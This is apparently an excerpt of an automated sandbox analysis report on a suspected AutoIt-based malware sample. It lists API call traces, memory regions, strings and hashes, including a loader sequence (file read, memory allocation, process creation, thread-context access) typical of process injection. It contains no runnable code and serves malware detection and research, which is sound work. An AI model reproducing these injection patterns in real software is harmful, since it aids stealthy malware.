                      • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                      • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                      Control-flow Graph

                      • Control-flow graph (rendered as an image; legend: Executed / Not Executed). Entry block 40708b-4071b0 calls 431940, 407667, 404706, 42050b, 407cab, 403f74, 407667, 407d8c and RegOpenKeyExW, then branches into the RegQueryValueExW / RegCloseKey path at 43e8b1. Full node and edge list omitted.
                      APIs
                        • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                        • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                      • RegCloseKey.ADVAPI32(?), ref: 0043E947
                      • _wcscat.LIBCMT ref: 0043E9A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                      • API String ID: 2673923337-2727554177
                      • Opcode ID: 2339a6e38c738e1e5868acd85c2b1d1357b8c61d0ac3e7440698b3df1474ed22
                      • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                      • Opcode Fuzzy Hash: 2339a6e38c738e1e5868acd85c2b1d1357b8c61d0ac3e7440698b3df1474ed22
                      • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                      Control-flow Graph

                      • Control-flow graph (rendered as an image; legend: Executed / Not Executed). Entry block 403633-403681; window-procedure dispatch reaching DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus. Full node and edge list omitted.
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                      • KillTimer.USER32(?,00000001), ref: 004036FC
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                      • CreatePopupMenu.USER32 ref: 0040373E
                      • PostQuitMessage.USER32(00000000), ref: 0040374D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated$%I
                      • API String ID: 129472671-1195164674
                      • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                      • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                      • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                      • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                      • LoadIconW.USER32(00000063), ref: 00403A76
                      • LoadIconW.USER32(000000A4), ref: 00403A88
                      • LoadIconW.USER32(000000A2), ref: 00403A9A
                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                      • RegisterClassExW.USER32(?), ref: 00403B16
                        • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                        • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                        • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                        • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                        • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                        • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                        • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                      • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                      • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                      • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 40c8a526af83e874734c458cd66a66ea69c56a95b20cec43cae739a4875aff13
                      • Instruction ID: 8279188914b1c91fb84030c9c235a9ab88c099852fc9e6d557e3eb9f9c242614
                      • Opcode Fuzzy Hash: 40c8a526af83e874734c458cd66a66ea69c56a95b20cec43cae739a4875aff13
                      • Instruction Fuzzy Hash: 6DA2C171D0E3A08FD735CB18C85476ABBE1AFC5398F09495EEB9997292D334A404CB93

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                      • API String ID: 1825951767-3937808951
                      • Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                      • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                      • Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                      • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                        • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                      • OleInitialize.OLE32(00000000), ref: 0040FA4A
                      • CloseHandle.KERNEL32(00000000), ref: 004445C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                      • String ID: <WL$\TL$%I$SL
                      • API String ID: 1986988660-4199584472
                      • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                      • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                      • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                      • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                      Control-flow Graph

                      • Control-flow graph (rendered as an image; legend: Executed / Not Executed). Entry block ba45c8-ba4676 calls ba1fe8, then CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, CloseHandle and VirtualFree along the main path. Full node and edge list omitted.
                      APIs
                      • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00BA4699
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BA48BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                      • Instruction ID: 2255011a4b1eac7a621b2c7960ca6b2d06482aa0acbd8d94485c19195ef55a78
                      • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                      • Instruction Fuzzy Hash: A5A11874E04209EBDB14CFA4C998BEEB7B5FF89304F208599E101BB281D7B99E44CB54

                      Control-flow Graph

                      • Control-flow graph (rendered as an image; legend: Executed / Not Executed). Single block 4039d5-403a45: CreateWindowExW (x2), ShowWindow (x2).
                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                      • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                      • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                      • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                      • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                      • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                      Control-flow Graph

                      • Control-flow graph (rendered as an image; legend: Executed / Not Executed). Entry block ba4398-ba44c8 calls ba1fe8 and ba4288, then CreateFileW, VirtualAlloc, ReadFile, calls to ba42c8, ba3288 and ba4318, and ExitProcess. Full node and edge list omitted.
                      APIs
                        • Part of subcall function 00BA4288: Sleep.KERNEL32(000001F4), ref: 00BA4299
                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA44BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: TGHE7ROQIPNLY106FNSBTWCC
                      • API String ID: 2694422964-3181031890
                      • Opcode ID: 4716bc230f5bdf2bb550b2c333e3234bd3a9fe54224e1130927f72fbe0180c48
                      • Instruction ID: ab1a56afd4f73285891d2b24d1fe3de31ead00cd438b5e5d44c4e98cec0d819d
                      • Opcode Fuzzy Hash: 4716bc230f5bdf2bb550b2c333e3234bd3a9fe54224e1130927f72fbe0180c48
                      • Instruction Fuzzy Hash: C9517171D08288EBEF11D7E4C855BEEBBB4AF55304F104599E6087B2C1D7B90B48CBA5

                      Control-flow Graph

                      • Control-flow graph (rendered as an image; legend: Executed / Not Executed). Entry block 40407c-404092; path reaches LoadStringW and Shell_NotifyIconW via calls to 407a16, 407bcc, 407b2e, 406fe3, 422de0, 40454e, 422dbc and 405904. Full node and edge list omitted.
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • _memset.LIBCMT ref: 004040FC
                      • _wcscpy.LIBCMT ref: 00404150
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                      • String ID: Line:
                      • API String ID: 3942752672-1585850449
                      • Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                      • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                      • Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                      • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 00BA3A43
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BA3AD9
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00BA3AFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                      • Instruction ID: e37224bf93bb721a756be2eb3db223397daa3225ef946c7690f1a3216c6fbf7a
                      • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                      • Instruction Fuzzy Hash: 43620E30A14658DBEB24CFA4C841BDEB3B6EF59700F1091A9E10DEB390E7759E81CB59
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                      • String ID:
                      • API String ID: 1559183368-0
                      • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                      • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                      • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                      • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                      APIs
                        • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                      • _free.LIBCMT ref: 0043E263
                      • _free.LIBCMT ref: 0043E2AA
                        • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$CurrentDirectoryLibraryLoad
                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                      • API String ID: 2861923089-1757145024
                      • Opcode ID: bcfd99442a652f6782b4065f3a7d06b8823211b735613b54d5c60ab115bb5f0d
                      • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                      • Opcode Fuzzy Hash: bcfd99442a652f6782b4065f3a7d06b8823211b735613b54d5c60ab115bb5f0d
                      • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                      APIs
                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                      • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                      • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                      • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                      • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                      APIs
                        • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                      • _free.LIBCMT ref: 004696A2
                      • _free.LIBCMT ref: 004696A9
                      • _free.LIBCMT ref: 00469714
                        • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                        • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                      • _free.LIBCMT ref: 0046971C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                      • String ID:
                      • API String ID: 1552873950-0
                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                      • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                      • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
